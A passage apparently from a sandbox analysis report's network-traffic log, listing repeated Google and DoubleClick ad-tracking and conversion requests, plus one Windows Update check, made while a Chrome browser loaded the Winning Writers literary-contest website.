Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960030432&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dYzGxftPmBGA9xBVt3rqHNi7iRcnLPZehUkX36lRnZmhts6cq&random=2357531407&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960030432&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dYzGxftPmBGA9xBVt3rqHNi7iRcnLPZehUkX36lRnZmhts6cq&random=2357531407&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960038420&cv=11&fst=1731960038420&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960038420&cv=11&fst=1731960038420&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960038420&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d7O67Cfg3AuzL-pZeDczgnCHbGjRKxwL7-o-biBakD5Tu0ox9&random=34939820&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960038420&cv=11&fst=1731960038420&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960038420&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d7O67Cfg3AuzL-pZeDczgnCHbGjRKxwL7-o-biBakD5Tu0ox9&random=34939820&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960046417&cv=11&fst=1731960046417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960046417&cv=11&fst=1731960046417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960046417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dnWfZn1gg_uOSN2rG9XZ2pGpmY1wEgnXatPG3YgyFZGEcD9JY&random=65996100&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960046417&cv=11&fst=1731960046417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=PWK4kk87hbNDodd&MD=PRszgUPh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960046417&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dnWfZn1gg_uOSN2rG9XZ2pGpmY1wEgnXatPG3YgyFZGEcD9JY&random=65996100&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960054416&cv=11&fst=1731960054416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /td/rul/1072733940?random=1731960054416&cv=11&fst=1731960054416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072733940/?random=1731960054416&cv=11&fst=1731960054416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
          Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072733940/?random=1731960054416&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7dAlGSLiJP-Qjr9JOfn8ETYLVgnlZDbke1AT-skAwr3dhPo1w8&random=496013729&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://winningwriters.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
